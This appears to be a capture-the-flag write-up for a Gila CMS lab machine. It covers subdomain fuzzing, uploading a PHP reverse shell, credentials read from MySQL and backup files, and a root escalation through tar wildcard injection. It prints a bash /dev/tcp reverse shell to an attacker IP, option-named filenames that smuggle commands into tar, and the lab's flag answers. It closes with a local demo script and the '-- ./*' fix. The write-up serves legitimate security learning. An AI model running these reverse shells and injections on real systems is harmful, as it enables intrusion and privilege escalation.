Can you root this Gila CMS box?
Scan the machine:
nmap -A -T4 10.10.29.227
Before starting, add the machine to /etc/hosts:
echo "10.10.29.227 cmess.thm" >> /etc/hosts
Checking the webpage, we have a Gila CMS.
I tested the search bar, nothing there.
I checked robots.txt, nothing useful either.
I found a login page, but it seems normal.
As the hint suggests, enumerate subdomains. Since cmess.thm only resolves through /etc/hosts (there is no DNS zone to brute-force), fuzz the Host header with wfuzz instead of a DNS tool; --hw 290 hides every response with the same word count as the default page (290 words), so only virtual hosts that answer differently are shown:
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz turns up dev, so add it to /etc/hosts as well (same machine IP as above):
echo "10.10.29.227 dev.cmess.thm" >> /etc/hosts
Log in to the admin panel.
Now we can upload a reverse shell. Copy pentestmonkey's PHP reverse shell and edit it so that $ip is the attacking machine (10.18.37.45 here) and $port is 1234:
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
After uploading, the file shows up under /assets. Start a listener, then open the shell's URL to trigger it:
nc -vlnp 1234
open http://cmess.thm/assets/php-reverse-shell.php in the browser
Upgrade to a fully interactive TTY (spawn a pty on the target, background the session, switch the local terminal to raw mode, then foreground it again):
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
Log in to the database as root with the password below:
mysql -u root -p
r0otus3rpassw0rd
show databases;
use gila;
show tables;
SELECT * FROM user;
Cracking the hash from the user table just gives back the password we already had.
I found something in the /tmp folder.
There is also a password backup in /opt.
su andre
UQfsdCB7aAP6
| Flag | user.txt |
|---|---|
| Answer | thm{c529b5d5d6ab6b430b7eb1903b2b5e1b} |
Check the cron jobs; there is something interesting:
cat /etc/crontab
Root periodically archives everything in our backup folder into /tmp as a tar.gz. Because tar is run over the directory contents through a shell wildcard, any filename that starts with -- is passed to tar as an option: a classic tar wildcard injection. A quick search turns it up, and GTFOBins lists it under tar.
Create shell.sh in /home/andre/backup:
#!/bin/bash
bash -i >& /dev/tcp/10.18.37.45/4444 0>&1
Then, still inside /home/andre/backup, create two files whose names tar will read as options when the wildcard expands (--checkpoint=1 makes tar hit a checkpoint after the first record, and the checkpoint action runs our script as root):
echo "" > "--checkpoint-action=exec=bash shell.sh"
echo "" > --checkpoint=1
Set up a listener and wait for the cron job to run:
nc -lnvp 4444
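Before relying on the cron timer, it helps to see the mechanism once on your own machine. The following is an added example (mine, not from the original writeup): it builds a throwaway directory containing the same two option-named files, runs tar over it the way an unquoted wildcard cron job would, and then repeats the run with a safe invocation. The function names run_tar_case, wildcard_injection_demo and wildcard_injection_fixed are my own, the payload only drops a marker file instead of a reverse shell, and it assumes GNU tar (the --checkpoint options are GNU extensions).

```shell
#!/bin/bash
# Added example, not part of the original writeup: reproduce the tar wildcard
# injection locally in a throwaway directory. The payload only creates a
# marker file, so nothing here needs the target box. Assumes GNU tar
# (--checkpoint and --checkpoint-action are GNU extensions); gzip is left
# out because compression plays no part in the injection.

# Runs tar over a constructed backup directory that contains two option-shaped
# filenames, the way the cron job does. $1 selects the invocation:
#   vulnerable  -> tar -cf archive *        (the shell expands * into argv)
#   fixed       -> tar -cf archive -- ./*   (no name can be taken as an option)
# Prints "executed" if the payload ran, "not-executed" if it did not, and
# "skipped" when GNU tar is unavailable.
run_tar_case() {
    local mode="$1" work marker archive
    tar --version 2>/dev/null | grep -q 'GNU tar' || { echo skipped; return 0; }
    work=$(mktemp -d) || return 1
    marker="$work.marker"     # outside the directory, so the glob never sees it
    archive="$work.tar"       # likewise kept out of the glob
    (
        cd "$work" || exit 1
        echo "ordinary backup content" > notes.txt
        # Constructed stand-in for shell.sh: instead of a reverse shell it
        # just leaves evidence that it ran as whoever invoked tar.
        printf '#!/bin/bash\ntouch "%s"\n' "$marker" > shell.sh
        # The two filenames from the writeup; tar parses them as arguments.
        echo "" > "--checkpoint-action=exec=bash shell.sh"
        echo "" > --checkpoint=1
        case "$mode" in
            vulnerable) tar -cf "$archive" * >/dev/null 2>&1 ;;
            fixed)      tar -cf "$archive" -- ./* >/dev/null 2>&1 ;;
            *)          exit 2 ;;
        esac
    ) || true
    if [ -e "$marker" ]; then echo executed; else echo not-executed; fi
    rm -rf "$work" "$archive" "$marker"
}

wildcard_injection_demo()  { run_tar_case vulnerable; }   # prints "executed"
wildcard_injection_fixed() { run_tar_case fixed; }        # prints "not-executed"

# Stand-alone run: show both outcomes side by side.
echo "unquoted wildcard: $(wildcard_injection_demo)"
echo "with -- ./*:       $(wildcard_injection_fixed)"
```

Running it prints executed for the bare wildcard and not-executed for tar -cf archive -- ./*, which is the fix the cron job needs: terminate options with -- or prefix the glob with ./ so that no filename can ever reach tar looking like an option. The same check works for any other cron job you find that globs a user-writable directory.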
| Flag | root.txt |
|---|---|
| Answer | thm{9f85b7fdeb2cf96985bf5761a93546a2} |